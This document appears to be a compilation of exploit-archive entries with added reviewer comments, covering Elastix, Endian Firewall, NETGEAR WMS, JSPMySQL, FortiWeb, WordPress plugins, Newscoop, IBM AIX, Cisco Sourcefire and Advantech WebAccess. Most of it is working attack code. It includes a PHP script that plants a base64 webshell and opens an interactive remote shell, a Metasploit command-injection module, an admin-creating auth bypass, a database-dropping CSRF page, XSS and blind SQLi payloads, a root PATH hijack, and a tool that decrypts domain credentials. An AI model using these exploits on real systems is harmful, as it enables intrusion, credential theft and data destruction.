<?
// Banner. NOTE(review): this script targets a file-inclusion/upload flaw in the
// vtigercrm component bundled with Elastix (<= 2.4 per the banner). Comments
// below describe what the visible code does and what a defender can look for.
echo "\n+-------------------------------------------+\n";
echo "| Elastix <= 2.4 |\n";
echo "| PHP Code Injection Exploit |\n";
echo "| By i-Hmx |\n";
echo "| sec4ever.com |\n";
echo "| n0p1337@gmail.com |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target [https://ip] # ";
// Base URL read from stdin; no scheme or format validation is done.
$target=trim(fgets(STDIN));
// First-stage payload: a PHP file whose eval() of the base64 blob drops a
// second file, farsawy.php, that eval()s base64 code taken from the POST field
// "fa" when the POST field "pwd" is set, printing the marker "Faris on the mic :D"
// around it (the markers are what the checks further down match on).
// On-disk indicator for defenders: farsawy.php under /vtigercrm/.
$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo="));
?>';
// Staged to a local file because the request below sends a file upload,
// not a string. fa.txt is left behind in the working directory.
$faf=fopen("fa.txt","w+");
fwrite($faf,$inj);
fclose($faf);
$myf='fa.txt';
// vtigercrm phprint.php: lang_crm carries "../" traversal and a trailing %00
// (null byte) terminator. A log/WAF rule on lang_crm= containing "../" or
// "%00" catches this stage.
$url =
$target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00";
// URL
$reffer = "http://1337s.cc/index.php";
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4)
Gecko/20030624 Netscape/7.1 (ax)";
// "/" is a directory, so curl cannot persist a cookie jar here; cookies only
// live for the duration of the handle.
$cookie_file_path = "/";
echo "| Injecting 1st payload\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, 1);
// Legacy "@/path" upload syntax: fa.txt is sent as the multipart field "userfile".
curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
// TLS certificate and hostname verification are disabled: the client will
// talk to any interposed host.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
// The response is never inspected; failure of this stage only surfaces later.
$result = curl_exec($ch);
curl_close($ch);
//echo $result;
echo "| Injecting 2nd payload\n";
// Sends a POST to $url with the raw body $post and returns the full response
// including headers (CURLOPT_HEADER), or false on a transport error.
// Redirects are not followed and the request times out after 20 s.
// As in the first request, TLS verification is off and "/" is not a usable
// cookie-jar path, so no cookies survive between calls.
function faget($url,$post){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
// Setting POSTFIELDS makes this a POST even when $post is "".
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
// Returns the text between the first occurrence of $start and the next
// occurrence of $end after it, or "" when $start is absent.
// The prepended space makes a real hit at offset 0 impossible (unless $start
// itself begins with a space), so the loose `== 0` test below effectively
// matches only strpos()'s `false` (not found).
// If $end is not found, strpos() returns false, $len becomes negative and
// substr() yields false/"" (version-dependent) instead of the remainder.
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
// Second request through the same traversal, now pointing at the cached
// import file; presumably this is what executes the staged first-stage
// payload. The response is discarded.
$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");
echo "| Testing total payload\n";
// Probe the dropped file; the marker string is emitted by the first-stage
// payload. POSTs to /vtigercrm/farsawy.php carrying a "pwd" field are the
// network indicator for this backdoor.
$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");
// eregi() was deprecated in PHP 5.3 and removed in 7.0; this check and the
// one below are fatal errors on modern interpreters.
if(!eregi("Faris on the mic :D",$total))
{
die("[+] Exploitation Failed\n");
}
echo "| Sending CMD test package\n";
$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
if(!eregi("farsawy",$cmd))
{
echo " + Cmd couldn't executed but we can evaluate php code\n + use :
$target//vtigercrm/fa.php\n Post : fa=base64code\n";
}
echo "| sec4ever shell online ;)\n\n";
$host=str_replace('https://','',$target);
// Interactive loop: each line typed is interpolated into passthru('...')
// without quoting, so a single quote in $c breaks the generated PHP.
while(1){
echo "i-Hmx@$host# ";
$c=trim(fgets(STDIN));
if($c=='exit'){die("[+] Terminating\n");}
$payload=base64_encode("passthru('$c');");
$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");
// Output is the text between the two "-----" marker lines printed by the
// dropped file; see kastr() for what happens when a marker is missing.
$done=kastr($fuck,"-----------------","-----------------");
echo "$done\n";
}
/*
I dont even remember when i exploited this shit!
maybe on 2013?!
whatever , Hope its not sold as 0day in the near future xDD
*/
?>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Metasploit module for CVE-2015-5082: the Endian Firewall proxy-password CGI
# passes the NEW_PASSWORD value to a shell, so a value of the form
# "<password>; <cmd>;" runs <cmd> as the web server user (see 'Description').
class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
# Module metadata and options. EFW_USERNAME/EFW_PASSWORD must be valid proxy
# account credentials; RPATH is the directory prefix substituted for the
# stager's chmod call in execute_command.
def initialize(info = {})
super(update_info(info,
'Name' => 'Endian Firewall Proxy Password Change Command Injection',
'Description' => %q{
This module exploits an OS command injection vulnerability in a
web-accessible CGI script used to change passwords for locally-defined
proxy user accounts. Valid credentials for such an account are
required.
Command execution will be in the context of the "nobody" account, but
this account had broad sudo permissions, including to run the script
/usr/local/bin/chrootpasswd (which changes the password for the Linux
root account on the system to the value specified by console input
once it is executed).
The password for the proxy user account specified will *not* be
changed by the use of this module, as long as the target system is
vulnerable to the exploit.
Very early versions of Endian Firewall (e.g. 1.1 RC5) require
HTTP basic auth credentials as well to exploit this vulnerability.
Use the USERNAME and PASSWORD advanced options to specify these values
if required.
Versions >= 3.0.0 still contain the vulnerable code, but it appears to
never be executed due to a bug in the vulnerable CGI script which also
prevents normal use (http://jira.endian.com/browse/UTM-1002).
Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug
(http://bugs.endian.com/print_bug_page.php?bug_id=3083).
Tested successfully against the following versions of EFW Community:
1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.
Should function against any version from 1.1 RC5 to 2.2.x, as well as
2.4.1 and 2.5.x.
},
'Author' => [
'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
],
'References' => [
['CVE', '2015-5082'],
['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
['EDB', '37426'],
['EDB', '37428']
],
'Privileged' => false,
'Platform' => %w{ linux },
'Payload' =>
{
# NUL, LF and CR cannot appear in the injected shell line.
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'Space' => 2048
},
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => [ :echo, :printf ]
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => [ :echo, :printf ]
}
]
],
'DefaultOptions' =>
{
# Endian's web UI listens on HTTPS 10443 by default.
'SSL' => true,
'RPORT' => 10443
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 28 2015',
'License' => MSF_LICENSE
))
register_options([
OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script',
'/cgi-bin/chpasswd.cgi']),
OptString.new('EFW_USERNAME', [true,
'Valid proxy account username for the target system']),
OptString.new('EFW_PASSWORD', [true,
'Valid password for the proxy user account']),
OptString.new('RPATH', [true,
'Target PATH for binaries used by the CmdStager', '/bin'])
], self.class)
register_advanced_options(
[
OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5])
], self.class)
end
# Stages a native ELF through the CGI using the echo/printf CmdStager.
# :nodelete leaves the staged executable on the target, so a dropped file
# owned by the web server user is the post-exploitation artefact to look for.
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig,
"#{peer} - Failed to store payload inside executable, " +
"please select a native payload")
end
execute_cmdstager(:linemax => 200, :nodelete => true)
end
# CmdStager callback: one shell line per call. gsub! mutates the stager's
# string in place; the absolute chmod path is used presumably because the CGI
# runs with a restricted PATH. opts is unused.
def execute_command(cmd, opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
req(cmd)
end
# Builds and sends the multipart form chpasswd.cgi expects. The injected
# value is placed in both NEW_PASSWORD fields so they match; the leading
# real password is what keeps the account's password unchanged (per the
# description). Detection: a POST to chpasswd.cgi whose NEW_PASSWORD_* field
# contains ";" or other shell metacharacters.
# Only 401 and 404 are reported; a nil response (timeout) passes silently.
def req(cmd)
sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"
post_data = Rex::MIME::Message.new
post_data.add_part('change', nil, nil, 'form-data; name="ACTION"')
post_data.add_part(datastore['EFW_USERNAME'], nil, nil, 'form-data; name="USERNAME"')
post_data.add_part(datastore['EFW_PASSWORD'], nil, nil, 'form-data; name="OLD_PASSWORD"')
post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_1"')
post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_2"')
post_data.add_part(' Change password', nil, nil, 'form-data; name="SUBMIT"')
data = post_data.to_s
boundary = post_data.bound
# Referer mimics a same-origin form submission.
referer_url =
"https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
"#{datastore['TARGETURI']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => datastore['TARGETURI'],
'ctype' => "multipart/form-data; boundary=#{boundary}",
'headers' => {
'Referer' => referer_url
},
'data' => data
})
if res
if res.code == 401
fail_with(Failure::NoAccess,
"#{rhost}:#{rport} - Received a 401 HTTP response - " +
"specify web admin credentials using the USERNAME " +
"and PASSWORD advanced options to target this host.")
end
if res.code == 404
fail_with(Failure::Unreachable,
"#{rhost}:#{rport} - Received a 404 HTTP response - " +
"your TARGETURI value is most likely not correct")
end
end
end
end
NETGEAR Wireless Management System - Authentication Bypass and
Privilege Escalation.
WMS5316 ProSafe 16AP Wireless Management System - Firmware 2.1.4.15
(Build 1236).
[-] Vulnerability Information:
==============================
Title: NETGEAR Wireless Management System - Authentication Bypass and
Privilege Escalation
CVE: Not assigned
Vendor: NETGEAR
Product: WMS5316 ProSafe 16AP Wireless Management System
Affected Version: Firmware 2.1.4.15 (Build 1236)
Fixed Version: Not publicly available
[-] Disclosure Timeline:
========================
22/04/2015
Vulnerability identified by Reinforce Services
23/04/2015
Support case created with NETGEAR.
24/04/2015
Vendor requested further information.
27/04/2015
Issue escalated within NETGEAR.
30/04/2015
Issue confirmed by vendor.
18/05/2015
Vendor confirmed issue present in other controllers (details unknown)
Beta update for WMS5316 expected first week of June.
06/25/2015
Vendor releases firmware version 2.1.5 that now contains a fix.
http://downloadcenter.netgear.com/en/product/WMS5316#
http://kb.netgear.com/app/answers/detail/a_id/29339
(Note: This has not been tested to confirm the issue is resolved)
[-] Proof of Concept:
=================
wget --keep-session-cookies --save-cookies=cookies.txt
--post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D"
http://192.168.1.2/login_handler.php && wget
--load-cookies=cookies.txt
--post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D"
http://192.168.1.2/request_handler.php
[-] Vulnerability Details:
==========================
The process to bypass authentication and escalate privileges is as follows:
One:
Include the "&" symbol anywhere in the password value in the login
request (as raw content - it must not be encoded).
Two:
After a moment, the system will accept those credentials and grant
access to the GUI. The account appears somewhat restricted - but this
is only client side.
Three:
Send a request to add a new administrative user.
Four:
The new admin account is then available for use as created above.
Note: As an alternative, it is trivial to modify the Java code on its
way down to a browser to enable all of the admin functions rather than
creating a new user.
This worked as well - so it's not strictly necessary to create a new
user; the bypass 'user' has full admin access if needed (leaving less
indicators of compromise)
[-] Credits:
============
Vulnerability discovered by Elliott Lewis of Reinforce Services
[-] Copyright:
==============
Copyright (c) Reinforce Services Limited 2015, All rights reserved
worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered
in any way without the express written consent of Reinforce Services
Limited.
[-] Disclaimer:
===============
The information herein contained may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties, implied or otherwise, with regard to this
information or its use. Any use of this information is at the user's
risk. In no event shall the author/distributor (Reinforce Services
Limited) be held liable for any damages whatsoever arising out of or
in connection with the use or spread of this information.
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-JSPMYSQLADMINISTRADOR-0904.txt
Vendor:
================================
JSPMySQL Administrador
https://sites.google.com/site/mfpledon/producao-de-software
Product:
================================
JSPMySQL Administrador v.1 is a tool for remote administration of MySQL
databases hosted on a web server, implemented with JSP technology.
Vulnerability Type:
===================
CSRF & XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
1) No CSRF token exists, allowing remote attackers to run arbitrary SQL
commands on the MySQL database.
2) An XSS entry point exists on the listaBD2.jsp web page, opening up the
application to client-side browser code execution.
In either case get victim to visit our malicious webpage or click on our
malicious linx then KABOOOOOOOOOOOOOOOOOOOOOOM!!!
Exploit code(s):
===============
1- CSRF to drop the default MySQL database on the remote server:
----------------------------------------------------------------
<!DOCTYPE>
<html>
<head>
<title>JSP-MYSQL-ADMIN-CSRF</title>
<!-- NOTE(review): <head> is never closed, the <script> below is never closed
either (so the form markup is part of the script text as written), and there
is no </html>. The server-side fix is a per-session anti-CSRF token checked
by listaBD2.jsp plus SameSite on the session cookie. -->
<body onLoad="doit()">
<script>
// Auto-submits the hidden form on load; the victim's browser attaches its
// own session cookie to the POST.
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
<!-- CSRF DROP MYSQL DATABASE -->
<form id="HELL" action="http://localhost:8081/sys/sys/listaBD2.jsp"
method="post">
<input type="text" name="cmd" value="DROP DATABASE mysql"/>
<input type="text" name="btncmd" value="Enviar" />
<input type="text" name="bd" value="mysql" />
</form>
2- XSS client side code execution delivered to the victim:
----------------------------------------------------------
http://localhost:8081/sys/sys/listaBD2.jsp?bd=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E
Disclosure Timeline:
=========================================================
Vendor Notification: August 31, 2015
September 4, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] JSPMySQL Administrador v.1
Vulnerable Parameter(s): [+] cmd, bd
Affected Area(s): [+] listaBD2.jsp
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/56774/info
Multiple Fortinet FortiWeb Appliances are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
The following FortiWeb application series are vulnerable:
FortiWeb-4000C
FortiWeb-3000C/3000CFsx
FortiWeb-1000C
FortiWeb-400C and
FortiWeb Virtual Appliance
https://www.example.com/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
https://www.example.com/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0
source: https://www.securityfocus.com/bid/56767/info
TinyMCPUK is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
TinyMCPUK 0.3 is vulnerable; other versions may also be affected.
http://www.example.com/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>
source: https://www.securityfocus.com/bid/56777/info
The Zingiri Forums plugin for WordPress is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
http://www.example.com/wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=[Directory or file]
source: https://www.securityfocus.com/bid/56792/info
The Nest theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/nest/gerador_galeria.php?codigo=[Sqli]
source: https://www.securityfocus.com/bid/56800/info
Newscoop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Newscoop 4.0.2 is vulnerable; other versions may also be affected.
Script: /admin/password_recovery.php
Payload: f_post_sent=1&f_email=example@example.com' and (select if(substr(password_reset_token,15,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password
# Exploit Title: Wordpress White-Label Framework XSS
# Google Dork: inurl:/wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
# Date: 7 September 2015
# Exploit Author: Outlasted
# Software Link: wordpress.com / http://whitelabelframework.com/
# Version: 2.0.6
#Greetz to: TeaMp0isoN
=====================================================
Vulnerable url: /wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
=====================================================
How to exploit?
----------------------------------------------------------------------------------------------------------
Enter your XSS payload in all forms and watch the magic.
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day
Let's kill some more bugs today and force vendor improvement :)
"""
$ cat /tmp/su
#!/bin/sh
/bin/sh
$ chmod +x /tmp/su
$ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
# /usr/bin/whoami
root
"""
References:
https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
--
/*
Cisco Sourcefire User Agent Insecure File Permissions Vulnerability
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco SF User Agent 2.2
Fixed version(s):
Cisco SF User Agent 2.2-25
Date: 08/09/2015
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco
BugId: CSCut44881
Disclosure Timeline:
18-03-2015: Vendor Notification
19-03-2015: Vendor Response/Feedback
01-09-2015: Vendor Fix/Patch
08-09-2015: Public Disclosure
Description:
Sourcefire User Agent monitors Microsoft Active Directory servers and reports logins and logoffs authenticated via LDAP.
The FireSIGHT System integrates these records with the information it collects via direct network traffic observation by managed devices.
Vulnerability:
Sourcefire User Agent is vulnerable to default insecure file permissions and hardcoded encryption keys.
A local attacker can exploit this by gaining access to the user-readable database file and extracting sensitive information.
In combination with hard-coded 3DES keys an attacker is able to decrypt configured Domain Controller accounts which can lead
to further attacks.
C:\Users\0x414141>icacls "C:\SourcefireUserAgent.sdf"
C:\SourcefireUserAgent.sdf BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Mandatory Label\High Mandatory Level:(I)(NW)
Successfully processed 1 files; Failed processing 0 files
*/
using System;
using System.Text;
using System.Security.Cryptography;
using System.Data.SqlServerCe;
namespace SFDecrypt
{
class Program
{
// Opens the User Agent's SQL CE database read-only and prints every
// active_directory_servers row with its password decrypted. Run as a
// standard user, it demonstrates the BUILTIN\Users (RX) ACL from the header.
static void Main(string[] args)
{
SqlCeConnection conn = null;
try
{
// Path from the icacls listing in the advisory header.
string FileName = @"C:\SourcefireUserAgent.sdf";
// Read-only open; Temp Path is set explicitly (presumably because a
// standard user cannot write beside the .sdf).
string ConnectionString = string.Format("DataSource=\"{0}\";Mode = Read Only;Temp Path =C:\\Windows\\Temp", FileName);
conn = new SqlCeConnection(ConnectionString);
string query = "Select host, domain, username, password FROM active_directory_servers";
SqlCeCommand cmd = new SqlCeCommand(query, conn);
conn.Open();
SqlCeDataReader rdr = cmd.ExecuteReader();
while (rdr.Read())
{
string strHost = rdr.GetString(0);
string strDom = rdr.GetString(1);
string strUser = rdr.GetString(2);
string strPass = rdr.GetString(3);
// Plaintext Domain Controller credentials go to stdout; any capture
// of this output is itself a credential disclosure.
Console.WriteLine("Host: " + strHost + " Domain: " + strDom + " Username: " + strUser + " Password: " + Decrypt.Decrypt3DES(strPass));
}
// Closed on the success path only; cmd, rdr and conn are never Dispose()d.
rdr.Close();
}
catch (Exception exception)
{
Console.Write(exception.ToString());
}
finally
{
// BUG: if new SqlCeConnection(...) throws, conn is still null here and
// Close() raises NullReferenceException out of the finally block.
conn.Close();
}
}
}
class Decrypt
{
// Decrypts a base64 3DES ciphertext with the key and IV hard-coded in the
// product (the advisory's second finding). Returns "" on any failure, so a
// corrupt value is indistinguishable from an empty password to the caller.
public static string Decrypt3DES(string strEncrypted)
{
string strDecrypted = "";
try
{
// TripleDESCryptoServiceProvider defaults apply: CBC mode, PKCS7 padding.
TripleDESCryptoServiceProvider provider = new TripleDESCryptoServiceProvider();
// 24-byte key (three-key 3DES) and 8-byte IV, both static across every
// install: anyone who can read the .sdf can recover every stored password.
// The vendor-side fix is a per-machine secret (e.g. DPAPI) instead of a
// constant embedded in the binary.
provider.Key = Encoding.UTF8.GetBytes("50uR<3F1r3R0xDaH0u5eW0o+");
provider.IV = Encoding.UTF8.GetBytes("53cUri+y");
byte[] inputBuffer = Convert.FromBase64String(strEncrypted);
byte[] bytes = provider.CreateDecryptor().TransformFinalBlock(inputBuffer, 0, inputBuffer.Length);
// Plaintext is UTF-16LE (Encoding.Unicode), i.e. the raw bytes of a .NET string.
strDecrypted = Encoding.Unicode.GetString(bytes);
}
catch (Exception exception)
{
// Swallowed: bad base64, a padding error and a missing CSP all look the same.
Console.Write("Error Decrypting Data: " + exception.Message);
}
return strDecrypted;
}
}
}
References:
https://tools.cisco.com/bugsearch/bug/CSCut44881
Introduction
*********************************************************************************
Advantech WebAccess is SCADA software used to remotely manage industrial
control system devices such as RTUs, generators and motors. Attackers can
execute code remotely by passing a maliciously crafted string to the
ConvToSafeArray API in the ASPVCOBJLib.AspDataDriven ActiveX control.
Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll
CVE-2014-9208
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
UpdateProject Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<!-- NOTE(review): this PoC instantiates a different control (CLSID 3703BA5D-...,
webdobj.dll) from the six that follow; </html> also appears twice below. -->
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype = "Sub UpdateProject ( ByVal WwwPort As String , ByVal ProjName
As String , ByVal ProjIP As String , ByVal ProjPort As Long , ByVal
ProjTimeout As Long , ByVal ProjDir As String )"
-->
' Crash trigger only: a 1044-byte ProjIP (arg3) overflows UpdateProject; the
' page carries no further exploitation. The prototype string above is wrapped
' across lines as pasted (presumably by the mailer), which VBScript cannot parse.
' Defensive control: set the kill bit for the CLSID above so IE cannot load it.
arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"
target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6
</script></html>
</html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function InterfaceFilter ( ByVal Interface As String ) As
String"
-->
' Crash trigger only: 1044-byte Interface argument. Defensive control: kill-bit
' CLSID 89D00354-B2EA-4755-915D-615D3962C7D7 (shared by the following PoCs).
arg1=String(1044, "A")
target.InterfaceFilter arg1
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
FileProcess Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Sub FileProcess ( ByVal Type As Integer , ByVal FileName As
String )"
-->
' Crash trigger only: 1044-byte FileName (arg2); Type is set to 1.
arg1=1
arg2=String(1044, "A")
target.FileProcess arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetWideStrCpy ( ByVal Type As Integer , ByVal inStr
As String ) As String"
-->
' Crash trigger only: 1044-byte inStr (arg2); Type is set to 1.
arg1=1
arg2=String(1044, "A")
target.GetWideStrCpy arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetRecipeInfo ( ByVal Type As Integer , ByVal
filePath As String )"
-->
' Crash trigger only: 1044-byte filePath (arg2); Type is set to 1.
arg1=1
arg2=String(1044, "A")
target.GetRecipeInfo arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->
' Crash trigger only: 1044-byte TagName argument.
arg1=String(1044, "A")
target.GetLastTagNbr arg1
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function ConvToSafeArray ( ByVal ArrSize As Integer , ByVal
inStr As String )"
-->
' Crash trigger only: 2068-byte inStr (arg2) with ArrSize=1 — the case the
' introduction names (CVE-2014-9208). Same kill-bit mitigation as above.
arg1=1
arg2=String(2068, "A")
target.ConvToSafeArray arg1 ,arg2
</script></html>
*********************************************************************************
Vulnerabilities were reported to Advantech sometime in January/February
